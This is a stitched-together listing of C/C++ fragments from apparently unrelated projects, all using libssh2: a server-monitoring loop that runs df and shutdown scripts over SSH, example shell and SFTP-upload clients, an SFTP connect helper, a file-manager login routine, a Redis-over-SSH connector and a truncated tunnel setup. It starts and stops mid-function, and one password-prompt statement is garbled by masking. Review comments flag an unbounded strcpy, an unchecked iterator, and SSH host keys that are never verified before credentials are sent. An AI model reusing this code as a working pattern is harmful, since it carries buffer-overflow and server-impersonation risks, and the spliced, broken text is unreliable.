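                    while ((rc = libssh2_channel_exec(channel2, "df -kh |grep -v grep")) == LIBSSH2_ERROR_EAGAIN)
                    {
                        waitsocket(sock, session);
                    }

                    memset(command, 0, sizeof (command));
                    lnReturnCode = (int) libssh2_channel_read(channel2, command, sizeof (command) - 1);
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)lnReturnCode %d command after executing %s\n", LOG_LOCATION, lnReturnCode, command);

                    // NOTE(review): unbounded copy into ld.spaceInfo.
                    strcpy(ld.spaceInfo,command);
                    memset(command, 0, sizeof (command));
                    libssh2_channel_free(channel2);
                    channel2 = NULL;
                }
            }
            else if((strcmp(sample->ip_info[i].psl,"Line"))==0)
            {
                DBConnection lDBConnectionObject;
                char* dbUserName = "******";
                char* dbPassWord = "******";
                char* dbName = "mani";
                char* dbPort = "5432";

                if(0==lDBConnectionObject.getFoPiQueryResult(dbUserName,dbPassWord,dbName,dbPort,sample->ip_info[i].ipadress,ld))
                {
                    g_cSystemLogger.LogMessage("(%s:%s(:%d) Failed DB query \n", LOG_LOCATION);
                }
                g_cSystemLogger.LogMessage("(%s:%s(:%d) LineId %d Product details %s line count %d\n", LOG_LOCATION,ld.ld[0].fo_id,ld.ld[0].product_details,ld.line_count);
                lDBConnectionObject.Close();
            }

            // NOTE(review): iterMap is used without a test against end();
            // an address with no path entry would be dereferenced here.
            iterMap = conn->getPath().find(sample->ip_info[i].ipadress);
            g_cSystemLogger.LogMessage("(%s:%s(:%d))Path %s \n", LOG_LOCATION,iterMap->second.c_str());

            if (sample->ip_info[i].status == true)
            {
                if (channel2 != NULL)
                {
                    snprintf(command, sizeof (command), "%s%s",iterMap->second.c_str(),"/clear_server.sh >> /tmp/LOGS/cronlog 2>&1 &");

                    while ((rc = libssh2_channel_exec(channel2, command)) == LIBSSH2_ERROR_EAGAIN)
                    {
                        waitsocket(sock, session);
                    }

                    memset(command, 0, sizeof (command));
                    lnReturnCode = (int) libssh2_channel_read(channel2, command, sizeof (command) - 1);
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)lnReturnCode %d command after executing %s\n", LOG_LOCATION, lnReturnCode, command);
                    memset(command, 0, sizeof (command));
                    libssh2_channel_free(channel2);
                    channel2 = NULL;
                }
            }
            else if((sample->ip_info[i].status==false) && ((strcmp(sample->ip_info[i].psl,""))==0) && (sample->ip_info[i].CancelOrderId==0))
            {
                if (channel2 != NULL)
                {
                    snprintf(command, sizeof (command), "%s", "cd /home/mint/ga/bin; nohup ./shutdownall.sh >> /tmp/LOGS/cronlog1 2>&1 &");
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)%s\n", LOG_LOCATION, command);

                    while ((rc = libssh2_channel_exec(channel2, command)) == LIBSSH2_ERROR_EAGAIN)
                    {
                        g_cSystemLogger.LogMessage("(%s:%s(:%d) ERROR Running command %d\n", LOG_LOCATION, rc);
                        waitsocket(sock, session);
                    }

                    memset(command, 0, sizeof (command));
                    lnReturnCode = (int) libssh2_channel_read(channel2, command, sizeof (command) - 1);
                    g_cSystemLogger.LogMessage("(%s:%s(:%d)lnReturnCode %d commandBuffer %s\n", LOG_LOCATION, lnReturnCode, command);
                    memset(command, 0, sizeof (command));
                    libssh2_channel_free(channel2);
                    channel2 = NULL;
                }
            }

            g_cSystemLogger.LogMessage("(%s:%s(:%d)space %s\n", LOG_LOCATION,ld.spaceInfo);
            CcopyStructure::copyCommandData(ld, ld.line_count);

            // Release the per-host resources; the session and the socket were
            // left open on every iteration before.
            if (channel2 != NULL)
            {
                libssh2_channel_free(channel2);
                channel2 = NULL;
            }
            libssh2_session_disconnect(session, "done");
            libssh2_session_free(session);
            close(sock);
        }
    }
    return true;
}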
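/*
 * Example client: connect to an SSH server on port 22, authenticate with the
 * identities offered by the local ssh-agent, then request a pty and a shell.
 *
 * argv[1] - server IPv4 address in dotted form (default: 127.0.0.1)
 * argv[2] - user name, stored in `username`, which is declared outside this
 *           function
 *
 * Returns 0 when the run completed and 1 on failure. A failed pty request
 * only skips the shell and does not change the exit status.
 */
int main(int argc, char *argv[])
{
    unsigned long hostaddr;
    int sock = -1, i, rc;
    struct sockaddr_in sin;
    const char *fingerprint;
    char *userauthlist;
    LIBSSH2_SESSION *session = NULL;
    LIBSSH2_CHANNEL *channel = NULL;
    LIBSSH2_AGENT *agent = NULL;
    struct libssh2_agent_publickey *identity, *prev_identity = NULL;
#ifdef WIN32
    WSADATA wsadata;

    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif

    if (argc > 1) {
        hostaddr = inet_addr(argv[1]);
    } else {
        hostaddr = htonl(0x7F000001);
    }

    if (argc > 2) {
        username = argv[2];
    }

    rc = libssh2_init (0);
    if (rc != 0) {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
        return 1;
    }

    /* Ultra basic "connect to port 22 on localhost".  Your code is
     * responsible for creating the socket establishing the connection
     */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        fprintf(stderr, "failed to create socket!\n");
        rc = 1;
        goto shutdown;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(22);
    sin.sin_addr.s_addr = hostaddr;
    if (connect(sock, (struct sockaddr*)(&sin),
                sizeof(struct sockaddr_in)) != 0) {
        fprintf(stderr, "failed to connect!\n");
        /* rc still holds 0 from libssh2_init(); report the failure. */
        rc = 1;
        goto shutdown;
    }

    /* Create a session instance and start it up. This will trade welcome
     * banners, exchange keys, and setup crypto, compression, and MAC layers
     */
    session = libssh2_session_init();
    if (!session) {
        fprintf(stderr, "Failure establishing SSH session\n");
        rc = 1;
        goto shutdown;
    }

    if (libssh2_session_handshake(session, sock)) {
        fprintf(stderr, "Failure establishing SSH session\n");
        /* Go through shutdown so the session and socket are released. */
        rc = 1;
        goto shutdown;
    }

    /* At this point we haven't authenticated. The first thing to do is check
     * the hostkey's fingerprint against our known hosts. Your app may have it
     * hard coded, may go to a file, may present it to the user, that's your
     * call.
     *
     * NOTE: this example only prints the SHA-1 fingerprint. Nothing compares
     * it with a trusted value, so the server's identity is not verified
     * before authentication starts. A real client must make that comparison
     * and stop on a mismatch.
     */
    fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
    if (fingerprint) {
        fprintf(stderr, "Fingerprint: ");
        for (i = 0; i < 20; i++) {
            fprintf(stderr, "%02X ", (unsigned char)fingerprint[i]);
        }
        fprintf(stderr, "\n");
    }

    /* check what authentication methods are available */
    userauthlist = libssh2_userauth_list(session, username, strlen(username));
    if (!userauthlist) {
        /* No list returned: strstr() below must not see NULL. */
        fprintf(stderr, "\"publickey\" authentication is not supported\n");
        rc = 1;
        goto shutdown;
    }
    fprintf(stderr, "Authentication methods: %s\n", userauthlist);
    if (strstr(userauthlist, "publickey") == NULL) {
        fprintf(stderr, "\"publickey\" authentication is not supported\n");
        rc = 1;
        goto shutdown;
    }

    /* Connect to the ssh-agent */
    agent = libssh2_agent_init(session);
    if (!agent) {
        fprintf(stderr, "Failure initializing ssh-agent support\n");
        rc = 1;
        goto shutdown;
    }
    if (libssh2_agent_connect(agent)) {
        fprintf(stderr, "Failure connecting to ssh-agent\n");
        rc = 1;
        goto shutdown;
    }
    if (libssh2_agent_list_identities(agent)) {
        fprintf(stderr, "Failure requesting identities to ssh-agent\n");
        rc = 1;
        goto shutdown;
    }

    /* Try each agent identity in turn until one is accepted. */
    while (1) {
        rc = libssh2_agent_get_identity(agent, &identity, prev_identity);
        if (rc == 1)
            break;          /* no more identities */
        if (rc < 0) {
            fprintf(stderr,
                    "Failure obtaining identity from ssh-agent support\n");
            rc = 1;
            goto shutdown;
        }
        if (libssh2_agent_userauth(agent, username, identity)) {
            fprintf(stderr, "\tAuthentication with username %s and "
                    "public key %s failed!\n",
                    username, identity->comment);
        } else {
            fprintf(stderr, "\tAuthentication with username %s and "
                    "public key %s succeeded!\n",
                    username, identity->comment);
            break;
        }
        prev_identity = identity;
    }
    if (rc) {
        fprintf(stderr, "Couldn't continue authentication\n");
        goto shutdown;
    }

    /* We're authenticated now. */

    /* Request a shell */
    if (!(channel = libssh2_channel_open_session(session))) {
        fprintf(stderr, "Unable to open a session\n");
        rc = 1;
        goto shutdown;
    }

    /* Some environment variables may be set,
     * It's up to the server which ones it'll allow though
     */
    libssh2_channel_setenv(channel, "FOO", "bar");

    /* Request a terminal with 'vanilla' terminal emulation
     * See /etc/termcap for more options
     */
    if (libssh2_channel_request_pty(channel, "vanilla")) {
        fprintf(stderr, "Failed requesting pty\n");
        goto skip_shell;
    }

    /* Open a SHELL on that pty */
    if (libssh2_channel_shell(channel)) {
        fprintf(stderr, "Unable to request shell on allocated pty\n");
        rc = 1;
        goto shutdown;
    }

    /* At this point the shell can be interacted with using
     * libssh2_channel_read()
     * libssh2_channel_read_stderr()
     * libssh2_channel_write()
     * libssh2_channel_write_stderr()
     *
     * Blocking mode may be (en|dis)abled with: libssh2_channel_set_blocking()
     * If the server send EOF, libssh2_channel_eof() will return non-0
     * To send EOF to the server use: libssh2_channel_send_eof()
     * A channel can be closed with: libssh2_channel_close()
     * A channel can be freed with: libssh2_channel_free()
     */

  skip_shell:
    if (channel) {
        libssh2_channel_free(channel);
        channel = NULL;
    }

    /* Other channel types are supported via:
     * libssh2_scp_send()
     * libssh2_scp_recv()
     * libssh2_channel_direct_tcpip()
     */

  shutdown:
    /* Several failure paths arrive here before the agent handle exists. */
    if (agent) {
        libssh2_agent_disconnect(agent);
        libssh2_agent_free(agent);
    }

    if (session) {
        libssh2_session_disconnect(session,
                                   "Normal Shutdown, Thank you for playing");
        libssh2_session_free(session);
    }

    if (sock != -1) {
#ifdef WIN32
        closesocket(sock);
#else
        close(sock);
#endif
    }

    fprintf(stderr, "all done!\n");

    libssh2_exit();

    return rc;
}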
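/*
 * Example client: upload a local file to an SSH server over SFTP using
 * libssh2 in non-blocking mode.
 *
 * argv[1] - server IPv4 address in dotted form (default: 127.0.0.1)
 * argv[2] - user name
 * argv[3] - password (also used as the key passphrase in the public-key
 *           branch); note that a password passed in argv is visible to other
 *           local users through the process list
 * argv[4] - local file to send
 * argv[5] - destination path on the server
 *
 * Returns 1 if libssh2 cannot be initialised, -1 if the connection,
 * authentication or transfer fails, and 0 after a completed transfer.
 * The file, socket, session and SFTP handles are released on every path.
 */
int main(int argc, char *argv[])
{
    unsigned long hostaddr;
    int sock = -1, i, auth_pw = 1;
    struct sockaddr_in sin;
    const char *fingerprint;
    LIBSSH2_SESSION *session = NULL;
    const char *username="******";
    const char *password="******";
    const char *loclfile="sftp_write_nonblock.c";
    const char *sftppath="/tmp/sftp_write_nonblock.c";
    int rc;
    int status = -1;
    FILE *local = NULL;
    LIBSSH2_SFTP *sftp_session = NULL;
    LIBSSH2_SFTP_HANDLE *sftp_handle = NULL;
    /* static: keeps the ~1 MB transfer buffer off the stack */
    static char mem[1024 * 1000];
    size_t nread;
    size_t memuse;
    time_t start;
    long total = 0;
    int duration;

#ifdef WIN32
    WSADATA wsadata;

    WSAStartup(MAKEWORD(2,0), &wsadata);
#endif

    if (argc > 1) {
        hostaddr = inet_addr(argv[1]);
    } else {
        hostaddr = htonl(0x7F000001);
    }

    if (argc > 2) {
        username = argv[2];
    }
    if (argc > 3) {
        password = argv[3];
    }
    if (argc > 4) {
        loclfile = argv[4];
    }
    if (argc > 5) {
        sftppath = argv[5];
    }

    rc = libssh2_init (0);
    if (rc != 0) {
        fprintf (stderr, "libssh2 initialization failed (%d)\n", rc);
        return 1;
    }

    local = fopen(loclfile, "rb");
    if (!local) {
        printf("Can't local file %s\n", loclfile);
        goto shutdown;
    }

    /*
     * The application code is responsible for creating the socket
     * and establishing the connection
     */
    sock = socket(AF_INET, SOCK_STREAM, 0);
    if (sock == -1) {
        fprintf(stderr, "failed to connect!\n");
        goto shutdown;
    }

    sin.sin_family = AF_INET;
    sin.sin_port = htons(22);
    sin.sin_addr.s_addr = hostaddr;
    if (connect(sock, (struct sockaddr*)(&sin),
                sizeof(struct sockaddr_in)) != 0) {
        fprintf(stderr, "failed to connect!\n");
        goto shutdown;
    }

    /* Create a session instance */
    session = libssh2_session_init();
    if (!session)
        goto shutdown;

    /* Since we have set non-blocking, tell libssh2 we are non-blocking */
    libssh2_session_set_blocking(session, 0);

    /* ... start it up. This will trade welcome banners, exchange keys,
     * and setup crypto, compression, and MAC layers.
     * The empty loop body re-issues the call while it would block.
     */
    while ((rc = libssh2_session_handshake(session, sock))
           == LIBSSH2_ERROR_EAGAIN);
    if (rc) {
        fprintf(stderr, "Failure establishing SSH session: %d\n", rc);
        goto shutdown;
    }

    /* At this point we haven't yet authenticated. The first thing to do is
     * check the hostkey's fingerprint against our known hosts. Your app may
     * have it hard coded, may go to a file, may present it to the user,
     * that's your call.
     *
     * NOTE: this example only prints the SHA-1 fingerprint; it is never
     * compared with a trusted value, so the password below is sent to a
     * server whose identity has not been verified. A real client must make
     * that comparison first.
     */
    fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);
    if (fingerprint) {
        printf("Fingerprint: ");
        for (i = 0; i < 20; i++) {
            printf("%02X ", (unsigned char)fingerprint[i]);
        }
        printf("\n");
    }

    if (auth_pw) {
        /* We could authenticate via password */
        while ((rc = libssh2_userauth_password(session, username, password))
               == LIBSSH2_ERROR_EAGAIN);
        if (rc) {
            printf("Authentication by password failed.\n");
            goto shutdown;
        }
    } else {
        /* Or by public key */
        while ((rc =
                libssh2_userauth_publickey_fromfile(session, username,
                                                    "/home/username/.ssh/id_rsa.pub",
                                                    "/home/username/.ssh/id_rsa",
                                                    password)) ==
               LIBSSH2_ERROR_EAGAIN);
        if (rc) {
            printf("\tAuthentication by public key failed\n");
            goto shutdown;
        }
    }

    fprintf(stderr, "libssh2_sftp_init()!\n");
    do {
        sftp_session = libssh2_sftp_init(session);

        if (!sftp_session &&
            (libssh2_session_last_errno(session) != LIBSSH2_ERROR_EAGAIN)) {
            fprintf(stderr, "Unable to init SFTP session\n");
            goto shutdown;
        }
    } while (!sftp_session);

    fprintf(stderr, "libssh2_sftp_open()!\n");
    /* Request a file via SFTP */
    do {
        sftp_handle =
            libssh2_sftp_open(sftp_session, sftppath,
                              LIBSSH2_FXF_WRITE|LIBSSH2_FXF_CREAT|LIBSSH2_FXF_TRUNC,
                              LIBSSH2_SFTP_S_IRUSR|LIBSSH2_SFTP_S_IWUSR|
                              LIBSSH2_SFTP_S_IRGRP|LIBSSH2_SFTP_S_IROTH);

        if (!sftp_handle &&
            (libssh2_session_last_errno(session) != LIBSSH2_ERROR_EAGAIN)) {
            fprintf(stderr, "Unable to open file with SFTP\n");
            goto shutdown;
        }
    } while (!sftp_handle);

    fprintf(stderr, "libssh2_sftp_open() is done, now send data!\n");

    start = time(NULL);

    memuse = 0; /* it starts blank */
    do {
        nread = fread(&mem[memuse], 1, sizeof(mem)-memuse, local);
        if (nread == 0) {
            /* end of file */
            if (memuse == 0)
                break;
            /* otherwise the previous sending is not finished */
        }
        memuse += nread;
        total += nread;

        /* write data in a loop until we block */
        while ((rc = libssh2_sftp_write(sftp_handle, mem, memuse)) ==
               LIBSSH2_ERROR_EAGAIN) {
            waitsocket(sock, session);
        }
        if (rc < 0)
            break;

        if (memuse - rc) {
            /* make room for more data at the end of the buffer */
            memmove(&mem[0], &mem[rc], memuse - rc);
            memuse -= rc;
        } else {
            /* 'mem' was consumed fully */
            memuse = 0;
        }

    } while (rc > 0);

    duration = (int)(time(NULL)-start);

    /* A transfer that finishes within the same second has duration 0; use
     * one second for the rate so the division is well defined. */
    printf("%ld bytes in %d seconds makes %.1f bytes/sec\n",
           total, duration, total/(double)(duration > 0 ? duration : 1));

    /* A negative rc means the last write failed. */
    status = (rc < 0) ? -1 : 0;

  shutdown:
    if (local) {
        fclose(local);
    }
    if (sftp_handle) {
        libssh2_sftp_close(sftp_handle);
    }
    if (sftp_session) {
        libssh2_sftp_shutdown(sftp_session);
    }

    if (session) {
        while (libssh2_session_disconnect(session,
                                          "Normal Shutdown, Thank you for playing")
               == LIBSSH2_ERROR_EAGAIN);
        libssh2_session_free(session);
    }

    if (sock != -1) {
#ifdef WIN32
        closesocket(sock);
#else
        close(sock);
#endif
    }

    printf("all done\n");

    libssh2_exit();

    return status;
}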
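/*
 * Open an SFTP connection for the given protocol object.
 *
 * Creates a TCP socket to host:port, performs the SSH handshake,
 * authenticates with username/password and starts the SFTP subsystem.
 * The socket, SSH session and SFTP session are stored in the sftp_data_t
 * that protocol->protocol_data points to.
 *
 * host must be a dotted IPv4 address; it is parsed with inet_addr() and is
 * not resolved through DNS.
 *
 * Returns 0 on success and -1 on failure. On failure everything acquired
 * here is released again, data->session is reset to NULL and data->sock
 * to -1.
 *
 * NOTE: the server's host key is never checked in this function, so the
 * password is sent to whichever server answered on host:port. Callers that
 * need to authenticate the server must compare the host key with a trusted
 * value between the handshake and libssh2_userauth_password().
 */
static int sftp_connect(protocol_data_t *protocol, char *host, int port, char *username, char *password)
{
    int rc;
    struct sockaddr_in sin = {0};

    if (protocol == NULL || protocol->protocol_data == NULL || host == NULL
            || username == NULL || password == NULL) {
        return -1;
    }

    sftp_data_t *data = (sftp_data_t *)protocol->protocol_data;

    sin.sin_family = AF_INET;
    sin.sin_port = htons(port);
    sin.sin_addr.s_addr = inet_addr(host);
    if (sin.sin_addr.s_addr == INADDR_NONE) {
        /* host is not a valid dotted IPv4 address */
        return -1;
    }

    data->sock = socket(AF_INET, SOCK_STREAM, 0);
    if (data->sock == -1) {
        return -1;
    }

    rc = unblock_connect(data->sock, (struct sockaddr*)(&sin), sizeof(struct sockaddr_in));
    if (rc != 0) {
        goto close_sock;
    }

    data->session = libssh2_session_init();
    if (!data->session) {
        goto close_sock;
    }

    rc = libssh2_session_handshake(data->session, data->sock);
    if (rc) {
        /* No SSH transport yet, so there is nothing to disconnect. */
        goto free_session;
    }

    rc = libssh2_userauth_password(data->session, username, password);
    if (rc) {
        goto shutdown;
    }

    data->sftp_session = libssh2_sftp_init(data->session);
    if (!data->sftp_session) {
        goto shutdown;
    }

    libssh2_session_set_blocking(data->session, 1);

    /* TODO: assign the remaining fields */

    return 0;

shutdown:
    libssh2_session_disconnect(data->session, "Normal Shutdown");
free_session:
    libssh2_session_free(data->session);
    data->session = NULL;
close_sock:
    close(data->sock);
    data->sock = -1;
    return -1;
}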
// Make sure an SSH session and an SFTP session exist for this object.
//
// Returns 0 immediately when sshSession is already set. Otherwise it resolves
// the configured server, connects the socket, performs the SSH handshake in
// non-blocking mode, authenticates, and initialises the SFTP subsystem.
//
// err  - if non-null, receives the error code when the attempt fails
// info - passed to WaitSocket() and, for keyboard-interactive, stored in
//        kbdIntInfo for the callback
//
// Returns 0 on success, -2 when the failure code is -2, and -1 for any other
// failure. On failure the session is freed and the socket closed.
//
// NOTE(review): no host key check is visible between the handshake and the
// authentication calls in this function, so credentials appear to be sent
// without verifying the server's identity - confirm whether that is done
// elsewhere.
int FSSftp::CheckSession( int* err, FSCInfo* info )
{
	// An existing session is reused as is.
	if ( sshSession ) { return 0; }

	try
	{
		unsigned ip;
		int e;

		if ( !GetHostIp( unicode_to_utf8( _operParam.server.Data() ).data(), &ip, &e ) )
		{
			throw int( e );
		}

		_sock.Create();
		_sock.Connect( ntohl( ip ), _operParam.port );

		sshSession = libssh2_session_init();

		if ( !sshSession ) { throw int( SSH_INTERROR_X3 ); }

		libssh2_session_set_blocking( sshSession, 0 );

		// WHILE_EAGAIN_ is defined elsewhere; presumably it repeats the call
		// while it returns LIBSSH2_ERROR_EAGAIN and leaves the result in e.
		WHILE_EAGAIN_( e, libssh2_session_handshake( sshSession, _sock.Id() ) );

		// libssh2 error codes are shifted by -1000 before being thrown.
		if ( e ) { throw int( e - 1000 ); }

		// User name: the configured one, or $LOGNAME on non-Windows builds.
		FSString userName = "";

		if ( _operParam.user.Data()[0] )
		{
			userName = _operParam.user.Data();
		}
		else
		{
#ifndef _WIN32
			char* ret = getenv( "LOGNAME" );

			if ( ret )
			{
				userName = FSString( sys_charset_id, ret );
				_operParam.user = userName.GetUnicode();

				// _infoParam is updated under infoMutex.
				MutexLock infoLock( &infoMutex );
				_infoParam.user = userName.GetUnicode();
			}

#endif
		};

		char* authList = 0;

		char* charUserName = ( char* )userName.Get( _operParam.charset );

		// Ask the server which authentication methods it accepts, waiting on
		// the socket until a list is returned.
		while ( true )
		{
			authList = libssh2_userauth_list( sshSession, charUserName, strlen( charUserName ) );

			if ( authList ) { break; }

			CheckSessionEagain();
			WaitSocket( info );
		}

		//publickey,password,keyboard-interactive
		static const char passId[] = "password";
		static const char kInterId[] = "keyboard-interactive";

		static unicode_t userSymbol = '@';

		// Walk the comma-separated method list and use the first entry that
		// starts with "password" or "keyboard-interactive". The comparison is
		// a prefix match (strncmp), not an exact token match.
		while ( true )
		{
			if ( !strncmp( authList, passId, strlen( passId ) ) )
			{
				FSPromptData data;
				data.visible = false;
				// NOTE(review): the next statement is garbled in this listing
				// (text between "Password:" and "SFTP_" appears to have been
				// masked out); it is reproduced exactly as found.
				data.prompt = utf8_to_unicode( "Password:"******"SFTP_" ).data(),
				                           carray_cat<unicode_t>( userName.GetUnicode(), &userSymbol, _operParam.server.Data() ).data(),
				                           &data, 1 ) ) { throw int( SSH_INTERROR_STOPPED ); }

				int ret;
				// data.prompt is what gets passed as the password argument.
				WHILE_EAGAIN_( ret, libssh2_userauth_password( sshSession,
				                                               ( char* )FSString( _operParam.user.Data() ).Get( _operParam.charset ),
				                                               ( char* )FSString( data.prompt.Data() ).Get( _operParam.charset ) ) );

				if ( ret ) { throw int( ret - 1000 ); }

				break; //!!!
			}
			else if ( !strncmp( authList, kInterId, strlen( kInterId ) ) )
			{
				// kbdIntInfo and kbdIntParam are set while kbdIntMutex is
				// held, for use by KbIntCallback.
				MutexLock lock( &kbdIntMutex );
				kbdIntInfo = info;
				kbdIntParam = &_operParam;

				int ret;
				WHILE_EAGAIN_( ret,
				               libssh2_userauth_keyboard_interactive( sshSession,
				                                                      ( char* )FSString( _operParam.user.Data() ).Get( _operParam.charset ),
				                                                      KbIntCallback )
				             );

				if ( ret ) { throw int( ret - 1000 ); }

				break; //!!!
			}

			// Advance to the entry after the next comma, or stop at the end
			// of the list. Reaching the end without a match falls through to
			// the SFTP initialisation below without any authentication call.
			char* s = authList;

			while ( *s && *s != ',' ) { s++; }

			if ( !*s ) { break; }

			authList = s + 1;
		};

		// Start the SFTP subsystem, waiting on the socket while libssh2
		// reports EAGAIN.
		while ( true )
		{
			sftpSession = libssh2_sftp_init( sshSession );

			if ( sftpSession ) { break; }

			if ( !sftpSession )
			{
				int e = libssh2_session_last_errno( sshSession );

				if ( e != LIBSSH2_ERROR_EAGAIN ) { throw int( e - 1000 ); }
			}

			WaitSocket( info );
		}

		return 0;

	}
	catch ( int e )
	{
		if ( err ) { *err = e; }

		//if (sftpSession) ??? closing the session seems to take care of everything
		if ( sshSession ) { libssh2_session_free( sshSession ); }

		sshSession = 0;
		sftpSession = 0;
		_sock.Close( false );
		return ( e == -2 ) ? -2 : -1;
	}
}
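/*
 * Create a blocking redis context for ip:port, optionally preceded by an SSH
 * login to ssh_address:ssh_port.
 *
 * When ssh_address is non-NULL and curMethod is not SSH_UNKNOWN, an SSH
 * session is established and authenticated first:
 *   - password              when the server offers it and curMethod is
 *                           SSH_PASSWORD
 *   - keyboard-interactive  when the server offers it (via kbd_callback)
 *   - public key            when the server offers it and curMethod is
 *                           SSH_PUBLICKEY
 * The session is stored in the returned context's `session` field; it is
 * NULL when no SSH login was requested.
 *
 * ssh_address must be a dotted IPv4 address (parsed with inet_addr()).
 *
 * Returns the new context, or NULL when the SSH setup fails or the context
 * cannot be allocated. The SSH session is freed on those failure paths.
 *
 * NOTE: the host key hash is requested but its value is discarded, so the
 * SSH server's identity is not verified before credentials are sent.
 *
 * NOTE(review): the keyboard-interactive branch does not look at curMethod,
 * so it is taken whenever the server offers that method and the password
 * branch was not selected - confirm that this is intended.
 *
 * NOTE(review): the socket descriptor is neither stored in the context nor
 * closed on the failure paths below; it should be released with the
 * platform's socket close routine.
 */
redisContext *redisConnect(const char *ip, int port, const char *ssh_address, int ssh_port, const char *username, const char *password,
                           const char *public_key, const char *private_key, const char *passphrase, int curMethod) {

    LIBSSH2_SESSION *session = NULL;
    redisContext *c;

    if (ssh_address && curMethod != SSH_UNKNOWN) {
        struct sockaddr_in sin;
        char *userauthlist;
        int auth_pw = 0;
        int sock;
        int rc;

        /* strlen(username) below must not see NULL */
        if (username == NULL) {
            return NULL;
        }

        rc = libssh2_init(0);
        if (rc != 0) {
            return NULL;
        }

        /* Connect to SSH server */
        sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
        if (sock == -1) {
            return NULL;
        }

        sin.sin_family = AF_INET;
        if (INADDR_NONE == (sin.sin_addr.s_addr = inet_addr(ssh_address))) {
            return NULL;
        }
        sin.sin_port = htons(ssh_port);
        if (connect(sock, (struct sockaddr*)(&sin),
                    sizeof(struct sockaddr_in)) != 0) {
            return NULL;
        }

        /* Create a session instance */
        session = libssh2_session_init();
        if (!session) {
            return NULL;
        }

        /* ... start it up. This will trade welcome banners, exchange keys,
         * and setup crypto, compression, and MAC layers
         */
        rc = libssh2_session_handshake(session, sock);
        if (rc) {
            goto fail;
        }

        /* Result unused: the fingerprint is not compared with anything. */
        libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1);

        /* The list comes from the remote server and may be NULL. */
        userauthlist = libssh2_userauth_list(session, username, strlen(username));
        if (userauthlist == NULL) {
            goto fail;
        }

        if (strstr(userauthlist, "password") != NULL) {
            auth_pw |= 1;
        }
        if (strstr(userauthlist, "keyboard-interactive") != NULL) {
            auth_pw |= 2;
        }
        if (strstr(userauthlist, "publickey") != NULL) {
            auth_pw |= 4;
        }

        if (auth_pw & 1 && curMethod == SSH_PASSWORD) {
            /* We could authenticate via password */
            if (libssh2_userauth_password(session, username, password)) {
                //"Authentication by password failed!";
                goto fail;
            }
        } else if (auth_pw & 2) {
            /* Or via keyboard-interactive */
            if (libssh2_userauth_keyboard_interactive(session, username, &kbd_callback)) {
                //"Authentication by keyboard-interactive failed!";
                goto fail;
            }
        } else if (auth_pw & 4 && curMethod == SSH_PUBLICKEY) {
            /* Or by public key */
            if (libssh2_userauth_publickey_fromfile(session, username, public_key, private_key, passphrase)) {
                //"Authentication by public key failed!";
                goto fail;
            }
        } else {
            //"No supported authentication methods found!";
            goto fail;
        }
    }

    c = redisContextInit();
    if (c == NULL) {
        goto fail;
    }

    c->session = session;
    c->flags |= REDIS_BLOCK;
    redisContextConnectTcp(c,ip,port,NULL);
    return c;

fail:
    /* Release the SSH session instead of leaking it on every error path. */
    if (session) {
        libssh2_session_free(session);
    }
    return NULL;
}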
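// Set up the SSH tunnel: connect to the tunnel host, verify its host key,
// authenticate, then open a local listening socket on an automatically
// chosen port.
//
// Steps, in order:
//   1. resolve m_tunnelhost and connect m_sock to the first address returned
//   2. create m_session and perform the SSH handshake
//   3. format the SHA-1 host key fingerprint and pass it to
//      IsHostKeyVerified(); stop if it is rejected
//   4. authenticate with the method selected in m_enAuthMethod, provided the
//      server offers it (keyboard-interactive is accepted as a substitute
//      when password was selected)
//   5. bind and listen on m_listensock, recording the chosen address and
//      port in m_local_listenip / m_local_listenport
//
// Returns true when the listener is ready, false on any failure (the reason
// is reported through LogSSHTunnelErrors or wxLogInfo).
//
// NOTE(review): the failure paths before the host key check return without
// calling Cleanup(); whether Cleanup() is safe to call that early cannot be
// told from this function, so they are left as they were.
bool CSSHTunnelThread::Initialize()
{
	int rc, auth = AUTH_NONE;
	int offered = 0;
	const char *fingerprint;
	char *userauthlist;

#ifdef WIN32
	char sockopt;
	WSADATA wsadata;
	int err;

	err = WSAStartup(MAKEWORD(2, 0), &wsadata);
	if(err != 0)
	{
		wxLogInfo(wxT("WSAStartup failed with error: %d"), err);
		return false;
	}
#else
	int sockopt;
#endif

	wxArrayString arrTunnelHostIP;

	if (resolveDNS(m_tunnelhost.mb_str(), arrTunnelHostIP))
	{
		rc = libssh2_init (0);

		if (rc != 0)
		{
			LogSSHTunnelErrors(wxString::Format(_("libssh2 initialization failed with error code %d"), rc), GetId());
			return false;
		}

		/* Connect to SSH server */
		m_sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
		m_sin.sin_family = AF_INET;
		if (INADDR_NONE == (m_sin.sin_addr.s_addr = inet_addr(arrTunnelHostIP.Item(0).mb_str())))
		{
			LogSSHTunnelErrors(wxString::Format(_("SSH error: Error in inet address with error code %d"), wxSysErrorCode()), GetId());
			return false;
		}
		m_sin.sin_port = htons(m_tunnelPort);
		if (connect(m_sock, (struct sockaddr *)(&m_sin),
		            sizeof(struct sockaddr_in)) != 0)
		{
			LogSSHTunnelErrors(wxString::Format(_("SSH error: Could not connect to socket with error code %d"), wxSysErrorCode()), GetId());
			return false;
		}

		/* Create a session instance */
		m_session = libssh2_session_init();

		if (!m_session)
		{
			LogSSHTunnelErrors(_("SSH error: Could not initialize SSH session!"), GetId());
			return false;
		}

		/* ... start it up. This will trade welcome banners, exchange keys,
		* and setup crypto, compression, and MAC layers
		*/
		rc = libssh2_session_handshake(m_session, m_sock);
		if (rc)
		{
			LogSSHTunnelErrors(wxString::Format(_("SSH error: Error when starting up SSH session with error code %d"), rc), GetId());
			return false;
		}

		/* At this point we haven't yet authenticated.  The first thing to do
		* is check the hostkey's fingerprint against our known hosts Your app
		* may have it hard coded, may go to a file, may present it to the
		* user, that's your call
		*/
		fingerprint = libssh2_hostkey_hash(m_session, LIBSSH2_HOSTKEY_HASH_SHA1);
		if (!fingerprint)
		{
			// Without a fingerprint the host key cannot be verified, so
			// authentication must not proceed.
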